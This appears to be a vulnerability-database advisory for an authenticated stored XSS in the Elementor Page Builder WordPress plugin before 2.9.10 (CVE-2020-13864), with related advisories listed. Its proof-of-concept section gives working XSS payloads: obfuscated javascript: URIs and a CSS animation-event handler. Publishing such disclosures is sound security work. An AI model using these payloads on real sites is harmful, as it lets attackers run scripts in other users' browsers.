Elementor Page Builder < 2.9.10 – Authenticated Stored XSS | CVE 2020-13864 | Plugin Vulnerabilities

Description

The Elementor Page Builder plugin is susceptible to stored XSS. An author user can create custom links containing XSS payloads or apply custom attributes to widgets which results in XSS.

Proof of Concept

javascript:alert(1), JaVaScript:alert(1), javas	cript:alert(1)

<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>

Affects Plugins

Fixed in 2.9.10

References

CVE

CVE

URL

https://www.softwaresecured.com/elementor-page-builder-stored-xss/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Jeremy Buis

Submitter

Jeremy Buis

Submitter twitter

Verified

No

WPVDB ID

31659b56-2046-4be8-887f-a016da138595

Timeline

Publicly Published

2020-06-05 (about 5 years ago)

Added

2020-06-05 (about 5 years ago)

Last Updated

2020-06-06 (about 5 years ago)

Other

Published

Title

Published

2025-02-21

Title

User List <= 1.5.1 - Reflected Cross-Site Scripting

Published

2025-01-06

Title

Dyn Business Panel <= 1.0.0 - Stored XSS via CSRF

Published

2023-11-06

Title

Brizy < 2.4.30 - Contributor+ Stored XSS

Published

2025-01-07

Title

Show Google Analytics widget <= 1.5.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2026-01-08

Title

Woodpecker for WordPress <= 3.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'form_name' Shortcode Attribute